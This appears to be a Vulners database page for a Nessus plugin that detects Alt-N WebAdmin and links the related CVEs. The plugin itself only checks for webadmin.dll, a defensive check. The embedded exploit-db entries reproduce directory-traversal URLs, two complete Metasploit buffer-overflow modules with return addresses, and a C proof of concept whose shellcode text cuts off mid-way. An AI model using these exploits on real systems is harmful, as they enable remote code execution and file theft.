Search...

Alt-N WebAdmin Multiple Vulnerabilities

2003-06-24T00:00:00

ID WEBADMIN.NASL
Type nessus
Reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
Modified 2021-01-02T00:00:00

Description

webadmin.dll was found on the web server. Old versions of this CGI suffered from numerous problems: - installation path disclosure - directory traversal, allowing anybody with administrative permission on WebAdmin to read any file - buffer overflow, allowing anybody to run arbitrary code on the server with SYSTEM privileges.

Note that no attack was performed, and the version number was not checked, so this might be a false alert

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

# References:
# http://www.kamborio.com/?Section=Articles&Mode=select&ID=55
#
# From: "Mark Litchfield" &lt;mark@ngssoftware.com&gt;
# To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
#   vulndb@securityfocus.com
# Date: Tue, 24 Jun 2003 15:22:21 -0700
# Subject: Remote Buffer Overrun WebAdmin.exe
#

include("compat.inc");

if (description)
{
  script_id(11771);
  script_version("1.28");
  script_cvs_date("Date: 2018/11/15 20:50:19");

  script_cve_id("CVE-2003-0471", "CVE-2003-1463");
  script_bugtraq_id(7438, 7439, 8024);

  script_name(english:"Alt-N WebAdmin Multiple Vulnerabilities");
  script_summary(english:"Checks for the presence of webadmin.dll");

  script_set_attribute(attribute:'synopsis', value:"The remote CGI is vulnerable to multiple flaws.");

  script_set_attribute(attribute:'description', value:
"webadmin.dll was found on the web server. Old versions of this CGI
suffered from numerous problems: - installation path disclosure -
directory traversal, allowing anybody with administrative permission
on WebAdmin to read any file - buffer overflow, allowing anybody to
run arbitrary code on the server with SYSTEM privileges.

Note that no attack was performed, and the version number was not
checked, so this might be a false alert");
  script_set_attribute(attribute:'see_also', value:"https://marc.info/?l=bugtraq&m=105647081418155&w=2");
  script_set_attribute(attribute:'see_also', value:'https://www.securityfocus.com/archive/1/319735');
  script_set_attribute(attribute:'solution', value:"Upgrade to Alt-N WebAdmin 2.0.5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"metasploit_name", value:'Alt-N WebAdmin USER Buffer Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_cwe_id(20);

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/06/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/06/24");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia &lt; 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);
res = is_cgi_installed3(port:port, item:"webadmin.dll");
if (res) security_hole(port);

JSON Vulners Source

Initial Source

{"id": "WEBADMIN.NASL", "bulletinFamily": "scanner", "title": "Alt-N WebAdmin Multiple Vulnerabilities", "description": "webadmin.dll was found on the web server. Old versions of this CGI\nsuffered from numerous problems: - installation path disclosure -\ndirectory traversal, allowing anybody with administrative permission\non WebAdmin to read any file - buffer overflow, allowing anybody to\nrun arbitrary code on the server with SYSTEM privileges.\n\nNote that no attack was performed, and the version number was not\nchecked, so this might be a false alert", "published": "2003-06-24T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11771", "reporter": "This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.", "references": ["https://www.securityfocus.com/archive/1/319735", "https://marc.info/?l=bugtraq&m=105647081418155&w=2"], "cvelist": ["CVE-2003-1463", "CVE-2003-0471"], "type": "nessus", "lastseen": "2021-01-01T07:00:28", "edition": 23, "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1463", "CVE-2003-0471"]}, {"type": "exploitdb", "idList": ["EDB-ID:22833", "EDB-ID:1210", "EDB-ID:16776", "EDB-ID:22541", "EDB-ID:22834", "EDB-ID:22542"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83099"]}, {"type": "osvdb", "idList": ["OSVDB:2653", "OSVDB:2207"]}, {"type": "openvas", "idList": ["OPENVAS:11771", "OPENVAS:136141256231011771"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/ALTN_WEBADMIN"]}], "modified": "2021-01-01T07:00:28", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-01-01T07:00:28", "rev": 2}, "vulnersScore": 6.6}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# References:\n# http://www.kamborio.com/?Section=Articles&Mode=select&ID=55\n#\n# From: \"Mark Litchfield\" <mark@ngssoftware.com>\n# To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,\n# vulndb@securityfocus.com\n# Date: Tue, 24 Jun 2003 15:22:21 -0700\n# Subject: Remote Buffer Overrun WebAdmin.exe\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11771);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2003-0471\", \"CVE-2003-1463\");\n script_bugtraq_id(7438, 7439, 8024);\n\n script_name(english:\"Alt-N WebAdmin Multiple Vulnerabilities\");\n script_summary(english:\"Checks for the presence of webadmin.dll\");\n\n script_set_attribute(attribute:'synopsis', value:\"The remote CGI is vulnerable to multiple flaws.\");\n\n script_set_attribute(attribute:'description', value:\n\"webadmin.dll was found on the web server. Old versions of this CGI\nsuffered from numerous problems: - installation path disclosure -\ndirectory traversal, allowing anybody with administrative permission\non WebAdmin to read any file - buffer overflow, allowing anybody to\nrun arbitrary code on the server with SYSTEM privileges.\n\nNote that no attack was performed, and the version number was not\nchecked, so this might be a false alert\");\n script_set_attribute(attribute:'see_also', value:\"https://marc.info/?l=bugtraq&m=105647081418155&w=2\");\n script_set_attribute(attribute:'see_also', value:'https://www.securityfocus.com/archive/1/319735');\n script_set_attribute(attribute:'solution', value:\"Upgrade to Alt-N WebAdmin 2.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Alt-N WebAdmin USER Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/06/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\nres = is_cgi_installed3(port:port, item:\"webadmin.dll\");\nif (res) security_hole(port);\n", "naslFamily": "CGI abuses", "pluginID": "11771", "cpe": [], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:33:03", "description": "Absolute path traversal vulnerability in Alt-N Technologies WebAdmin 2.0.0 through 2.0.2 allows remote attackers with administrator privileges to (1) determine the installation path by reading the contents of the Name parameter in a link, and (2) read arbitrary files via an absolute path in the Name parameter.", "edition": 3, "cvss3": {}, "published": "2003-12-31T05:00:00", "title": "CVE-2003-1463", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-1463"], "modified": "2017-07-29T01:29:00", "cpe": ["cpe:/a:alt-n:webadmin:2.0.2", "cpe:/a:alt-n:webadmin:2.0.0", "cpe:/a:alt-n:webadmin:2.0.1"], "id": "CVE-2003-1463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1463", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:alt-n:webadmin:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:alt-n:webadmin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:alt-n:webadmin:2.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:02", "description": "Buffer overflow in WebAdmin.exe for WebAdmin allows remote attackers to execute arbitrary code via an HTTP request to WebAdmin.dll with a long USER argument.", "edition": 3, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0471", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0471"], "modified": "2016-10-18T02:34:00", "cpe": ["cpe:/a:alt-n:webadmin:*"], "id": "CVE-2003-0471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0471", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:alt-n:webadmin:*:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T18:58:36", "description": "Alt-N WebAdmin 2.0.x Remote File Viewing Vulnerability. CVE-2003-1463. Remote exploit for cgi platform", "published": "2003-04-25T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x - Remote File Viewing Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1463"], "modified": "2003-04-25T00:00:00", "id": "EDB-ID:22541", "href": "https://www.exploit-db.com/exploits/22541/", "sourceData": "source: http://www.securityfocus.com/bid/7438/info\r\n\r\nAlt-N WebAdmin allows a remote user to access files that they should not be able to access. The remote user can submit an HTTP request that will return the contents of any webserver-readable file on the system.\r\n\r\nNOTE: The user must have administrative privileges in WebAdmin to access these files.\r\n\r\nhttp://server/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:\\WINNT&File:Name=WIN.INI&View=ViewFile\r\n\r\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/22541/"}, {"lastseen": "2016-02-02T18:58:44", "description": "Alt-N WebAdmin 2.0.x Remote File Disclosure Vulnerability. CVE-2003-1463. Remote exploit for cgi platform", "published": "2003-04-25T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x - Remote File Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1463"], "modified": "2003-04-25T00:00:00", "id": "EDB-ID:22542", "href": "https://www.exploit-db.com/exploits/22542/", "sourceData": "source: http://www.securityfocus.com/bid/7439/info\r\n\r\nReportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information.\r\n\r\nhttp://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\\MDaemon\\App&File:Name=MDAEMON.INI&View=EditFile ", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/22542/"}, {"lastseen": "2016-01-31T13:46:25", "description": "WebAdmin <= 2.0.4 USER Buffer Overflow Exploit. CVE-2003-0471. Remote exploit for windows platform", "published": "2005-09-11T00:00:00", "type": "exploitdb", "title": "WebAdmin <= 2.0.4 USER Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2005-09-11T00:00:00", "id": "EDB-ID:1210", "href": "https://www.exploit-db.com/exploits/1210/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::altn_webadmin;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info =\r\n {\r\n\r\n\t'Name' => 'Alt-N WebAdmin USER Buffer Overflow',\r\n\t'Version' => '$Revision: 1.1 $',\r\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],\r\n\t'Priv' => 0,\r\n\t\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t'UserOpts' => {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 1000],\r\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\r\n\t },\r\n\t \r\n\t\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 830,\r\n\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\nAlt-N WebAdmin is prone to a buffer overflow condition. \r\nThis is due to insufficient bounds checking on the USER \r\nparameter. Successful exploitation could result in code \r\nexecution with SYSTEM level privileges.\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['BID', '8024'],\r\n\t\t['NSS', '11771'],\r\n\t ],\r\n\t \r\n\t'Targets' =>\r\n\t [\r\n\t\t['WebAdmin 2.0.4 Universal', 0x10074d9b], # 2.0.4 webAdmin.dll\r\n\t\t['WebAdmin 2.0.3 Universal', 0x10074b13], # 2.0.3 webAdmin.dll\r\n\t\t['WebAdmin 2.0.2 Universal', 0x10071e3b], # 2.0.2 webAdmin.dll\r\n\t\t['WebAdmin 2.0.1 Universal', 0x100543c2], # 2.0.1 webAdmin.dll\r\n\r\n\t ],\r\n\t'Keys' => ['webadmin'],\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Check {\r\n\tmy ($self) = @_;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn $self->CheckCode('Connect');\r\n\t}\r\n\r\n\t$s->Send(\"GET / HTTP/1.0\\r\\n\\r\\n\");\r\n\tmy $res = $s->Recv(-1, 20);\r\n\t$s->Close();\r\n\r\n\tif ($res !~ /v2\\.0\\.4|v2\\.0\\.3|v2\\.0\\.2|v2\\.0\\.1/) {\r\n\t\t$self->PrintLine(\"[*] This server does not appear to be vulnerable.\");\r\n\t\treturn $self->CheckCode('Safe');\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Vulnerable installation detected :-)\");\r\n\treturn $self->CheckCode('Detected');\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (! $self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"[*] Failed to initialize the nop module.\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $splat = Pex::Text::AlphaNumText(168);\r\n\r\n\tmy $credz =\r\n\t \"User=\". $splat. pack('V', $target->[1]). $shellcode.\r\n\t \"&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In\\r\\n\";\r\n\r\n\tmy $sploit =\r\n\t \"POST /WebAdmin.DLL?View=Logon HTTP/1.1\\r\\n\".\r\n\t \"Content-Type: application/x-www-form-urlencoded\\r\\n\".\r\n\t \"Connection: close\\r\\n\".\r\n\t \"Cookie: User=y0; Lang=en; Theme=standard\\r\\n\".\r\n\t \"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\\r\\n\".\r\n\t \"Host: $target_host\\r\\n\".\r\n\t \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\\r\\n\".\r\n\t \"Accept-Language: en\\r\\n\".\r\n\t \"Accept-Charset: iso-8859-1,*,utf-8\\r\\n\".\r\n\t \"Content-Length: \". length($credz). \"\\r\\n\\r\\n\".\r\n\t $credz;\r\n\r\n\t$self->PrintLine(sprintf(\"[*] Trying to exploit target %s 0x%.8x\", $target->[0], $target->[1]));\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$s->Send($sploit);\r\n\t$self->Handler($s);\r\n\t$s->Close();\r\n\treturn;\r\n}\n\n# milw0rm.com [2005-09-11]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1210/"}, {"lastseen": "2016-02-02T06:28:58", "description": "Alt-N WebAdmin USER Buffer Overflow. CVE-2003-0471. Remote exploit for windows platform", "published": "2010-02-15T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2010-02-15T00:00:00", "id": "EDB-ID:16776", "href": "https://www.exploit-db.com/exploits/16776/", "sourceData": "##\r\n# $Id: altn_webadmin.rb 8498 2010-02-15 00:48:03Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Alt-N WebAdmin USER Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tAlt-N WebAdmin is prone to a buffer overflow condition. This\r\n\t\t\t\tis due to insufficient bounds checking on the USER\r\n\t\t\t\tparameter. Successful exploitation could result in code\r\n\t\t\t\texecution with SYSTEM level privileges.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 8498 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2003-0471' ],\r\n\t\t\t\t\t[ 'OSVDB', '2207' ],\r\n\t\t\t\t\t[ 'BID', '8024'],\r\n\t\t\t\t\t[ 'NSS', '11771'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 830,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', {}],\r\n\t\t\t\t\t['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll\r\n\t\t\t\t\t['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll\r\n\t\t\t\t\t['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll\r\n\t\t\t\t\t['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 24 2003'))\r\n\r\n\t\t\tregister_options([Opt::RPORT(1000)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tmytarget = target\r\n\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tres = send_request_raw({\r\n\t\t\t\t'uri' => '/WebAdmin.DLL'\r\n\t\t\t}, -1)\r\n\r\n\t\t\tif (res and res.body =~ /WebAdmin.*v(2\\..*)$/)\r\n\t\t\t\tcase $1\r\n\t\t\t\twhen /2\\.0\\.4/\r\n\t\t\t\t\tmytarget = targets[1]\r\n\t\t\t\twhen /2\\.0\\.3/\r\n\t\t\t\t\tmytarget = targets[2]\r\n\t\t\t\twhen /2\\.0\\.2/\r\n\t\t\t\t\tmytarget = targets[3]\r\n\t\t\t\twhen /2\\.0\\.1/\r\n\t\t\t\t\tmytarget = targets[4]\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_error(\"No target found for v#{$1}\")\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"No target found\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tuser_cook = rand_text_alphanumeric(2)\r\n\t\tpost_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded\r\n\t\tpost_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'\r\n\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/WebAdmin.DLL',\r\n\t\t\t'query' => 'View=Logon',\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'content-type' => 'application/x-www-form-urlencoded',\r\n\t\t\t'cookie' => \"User=#{user_cook}; Lang=en; Theme=standard\",\r\n\t\t\t'data' => post_data,\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',\r\n\t\t\t\t'Accept-Language' => 'en',\r\n\t\t\t\t'Accept-Charset' => 'iso-8859-1,*,utf-8'\r\n\t\t\t}\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16776/"}, {"lastseen": "2016-02-02T19:38:53", "description": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (1). CVE-2003-0471. Remote exploit for windows platform", "published": "2003-06-24T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2003-06-24T00:00:00", "id": "EDB-ID:22833", "href": "https://www.exploit-db.com/exploits/22833/", "sourceData": "source: http://www.securityfocus.com/bid/8024/info\r\n\r\nAlt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.\r\n\r\n/* WebAdmin.dll remote proof of concept 2.0.4 version.. tried finding 2.0.5 but all versions\r\nwere already patched from the dl sites... this was tested on a win2ksp2 server, i suggest\r\nusing better shellcode this is just something i know works, just opens a cmd.exe prompt\r\non the victim box. I imagine this won't be too much harder to exploit with 2.0.5 unpatched\r\nthis took me about 1 hour to write and it was my first remote win32 exploit, thank you alt-n :D.\r\nword to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32\r\nexploitation download this and attempt to exploit it, it's easier than you think.\r\nshouts to innercircle you little kittens you....\r\n-wire */\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib \"ws2_32\");\r\nchar sc[] = \r\n\t\t\t\t\t \"\\x55\"\t\t\t\t\t// push ebp\r\n\t\t\t\t\t \"\\x8b\\xec\"\t\t\t\t// mov ebp, esp\r\n\t\t\t\t\t \"\\x53\"\t\t\t\t\t// push ebx\r\n\t\t\t\t\t \"\\x56\"\t\t\t\t\t// push esi\r\n\t\t\t\t\t \"\\x57\"\t\t\t\t\t// push edi\r\n\t\t\t\t\t \"\\x8b\\xe5\"\t\t\t\t// mov esp, ebp\t\t\t\t\r\n\t\t\t\t\t \"\\x55\"\t\t\t\t\t// push ebp\r\n\t\t\t\t\t \"\\x8b\\xec\"\t\t\t\t// mov ebp, esp\r\n\t\t\t\t\t \"\\x33\\xff\"\t\t\t\t// xor edi,edi\r\n\t\t\t\t\t \"\\x57\"\t\t\t\t\t// push edi\r\n\t\t\t\t\t \"\\x57\"\t\t\t\t\t// push edi\r\n\t\t\t\t\t \"\\xc6\\x45\\xf8\\x6d\"\t\t\t// mov byte ptr ss:[ebp-8],6d\r\n\t\t\t\t\t \"\\xc6\\x45\\xf9\\x73\"\t\t\t// mov byte ptr ss:[ebp-7],73\r\n\t\t\t\t\t \"\\xc6\\x45\\xfa\\x76\"\t\t\t// mov byte ptr ss:[ebp-6],76\r\n\t\t\t\t\t \"\\xc6\\x45\\xfb\\x63\"\t\t\t// mov byte ptr ss:[ebp-5],63\r\n\t\t\t\t\t \"\\xc6\\x45\\xfc\\x72\"\t\t\t// mov byte ptr ss:[ebp-4],72\r\n\t\t\t\t\t \"\\xc6\\x45\\xfd\\x74\"\t\t\t// mov byte ptr ss:[ebp-3],74\r\n\t\t\t\t\t \"\\xb8\\x54\\xa2\\xe8\\x77\" \t\t// mov eax,kernel32.loadlibraryA;\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\x8d\\x45\\xf8\"\t\t\t\t// lea eax, dword ptr ss:[ebp-8]\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\xff\\x55\\xf4\"\t\t\t\t// call dword ptr ss:[ebp-c]\r\n\t\t\t\t\t \"\\x58\"\t\t\t\t\t// pop eax\r\n\t\t\t\t\t \"\\x58\"\t\t\t\t\t// pop eax\r\n\t\t\t\t\t \"\\x58\"\t\t\t\t\t// pop eax\r\n\t\t\t\t\t \"\\x33\\xc0\"\t\t\t\t// xor eax,eax\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\xc6\\x45\\xf8\\x63\"\t\t\t// mov byte ptr ss:[ebp-8],63\r\n\t\t\t\t\t \"\\xc6\\x45\\xf9\\x6d\"\t\t\t// mov byte ptr ss:[ebp-7],6d\r\n\t\t\t\t\t 